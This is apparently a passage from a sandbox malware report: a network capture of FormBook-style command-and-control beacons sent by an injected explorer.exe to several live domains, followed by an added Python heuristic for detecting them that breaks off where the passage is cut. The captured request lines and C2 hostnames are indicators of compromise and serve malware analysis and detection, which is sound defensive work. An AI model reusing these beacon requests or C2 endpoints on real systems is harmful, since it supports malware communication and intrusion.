Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 30, 2023 14:57:23.581691980 CET | 351 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 30 Nov 2023 13:57:23 GMT
Content-Type: text/html
Content-Length: 150
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49748 | 34.93.103.39 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2023 14:58:03.063024998 CET | 240 | OUT | GET /ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
Host: www.optimusvisionlb.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 30, 2023 14:58:03.408822060 CET | 605 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 30 Nov 2023 13:58:03 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.optimusvisionlb.com/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                   2 | 192.168.2.6 | 49749 | 104.140.89.24 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                   Nov 30, 2023 14:58:24.506469965 CET | 232 | OUT | GET /ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.maltsky.net
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:


                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                   3 | 192.168.2.6 | 49750 | 3.33.130.190 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                   Nov 30, 2023 14:58:44.521867990 CET | 232 | OUT | GET /ao65/?3f94p=1+k7ryNQzoPRnNssVcxEVGqYVXcpdNYnwR6YaRuf8QIEqfcPbXX6k2BVupn8sj0YeeXTfXT4xQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.thnkotb.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                   Nov 30, 2023 14:58:44.626300097 CET | 514 | IN | HTTP/1.1 403 Forbidden
                                                                                                  Server: openresty
                                                                                                  Date: Thu, 30 Nov 2023 13:58:44 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 291
                                                                                                  Connection: close
                                                                                                  ETag: "6552b21e-123"
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                   4 | 192.168.2.6 | 49751 | 104.247.81.50 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                   Nov 30, 2023 14:59:05.034219027 CET | 235 | OUT | GET /ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.harmonicod.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                   Nov 30, 2023 14:59:05.162866116 CET | 343 | IN | HTTP/1.1 403 Forbidden
                                                                                                  Server: nginx
                                                                                                  Date: Thu, 30 Nov 2023 13:59:05 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 146
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                   5 | 192.168.2.6 | 49752 | 37.97.254.27 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                   Nov 30, 2023 14:59:25.599111080 CET | 247 | OUT | GET /ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.kermisbedrijfkramer.online
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                   Nov 30, 2023 14:59:25.780606985 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Tue, 19 Sep 2023 17:56:11 GMT
                                                                                                  Server: Apache
                                                                                                  Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Type: text/html
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  X-Varnish: 612203309 3
                                                                                                  Age: 6206594
                                                                                                  Via: 1.1 varnish (Varnish/6.1)
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 64668
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 
3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                                   Nov 30, 2023 14:59:25.780627012 CET | 1340 | IN | Data Raw: 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c 3d 22
                                                                                                  Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="
                                                                                                   Nov 30, 2023 14:59:25.780642986 CET | 1340 | IN | Data Raw: 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63
                                                                                                  Data Ascii: 2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                                   Nov 30, 2023 14:59:25.780658007 CET | 1340 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                                   Nov 30, 2023 14:59:25.780670881 CET | 1340 | IN | Data Raw: 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65
                                                                                                  Data Ascii: ved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <pa
                                                                                                   Nov 30, 2023 14:59:25.780683041 CET | 1340 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c 31 2c
                                                                                                  Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo-p
                                                                                                   Nov 30, 2023 14:59:25.780695915 CET | 1340 | IN | Data Raw: 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 72
                                                                                                  Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                                   Nov 30, 2023 14:59:25.780708075 CET | 1340 | IN | Data Raw: 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width="1
                                                                                                   Nov 30, 2023 14:59:25.780720949 CET | 1340 | IN | Data Raw: 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e 33 34
                                                                                                  Data Ascii: h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g><
                                                                                                   Nov 30, 2023 14:59:25.780736923 CET | 1340 | IN | Data Raw: 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: 25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-4.
                                                                                                   Nov 30, 2023 14:59:25.960726023 CET | 1340 | IN | Data Raw: 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c 30 63
                                                                                                  Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,4.


                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                   6 | 192.168.2.6 | 49753 | 62.72.50.88 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                   Nov 30, 2023 14:59:45.996751070 CET | 239 | OUT | GET /ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.stellarskyline.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                   Nov 30, 2023 14:59:46.150660992 CET | 1143 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 707
                                                                                                  date: Thu, 30 Nov 2023 13:59:46 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP
                                                                                                  platform: hostinger
                                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 
3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                   7 | 192.168.2.6 | 49754 | 156.237.159.158 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                   Nov 30, 2023 15:00:09.039658070 CET | 231 | OUT | GET /ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.hivaom.top
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
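
The sessions above all come from the same injected explorer.exe (PID 4004) and share one shape: GET to the path /ao65/ with the two query parameters 3f94p and ojq4i, base64-looking values, the ojq4i value identical in every request, and a different Host header each time. The responses on this capture are redirects, 403s and a parked-domain page, so a detection that waits for a successful reply would miss the beacon. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox logic; it keys on the client-side pattern only. The six explorer.exe request lines are copied from sessions 2 to 7; the updater.exe record is a constructed benign control, and the thresholds and field names are the author's choices.

```python
"""Cluster HTTP requests into FormBook-style C2 beacons.

Added example, not from the report. Heuristic: one process issuing the same
path and query-parameter names to several hosts, every value base64-like,
and at least one parameter value constant across all hosts.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")

SAMPLE_REQUESTS = [
    # (pid, process, Host header, request line) -- copied from sessions 2 to 7 above
    (4004, r"C:\Windows\explorer.exe", "www.maltsky.net",
     "GET /ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1"),
    (4004, r"C:\Windows\explorer.exe", "www.thnkotb.com",
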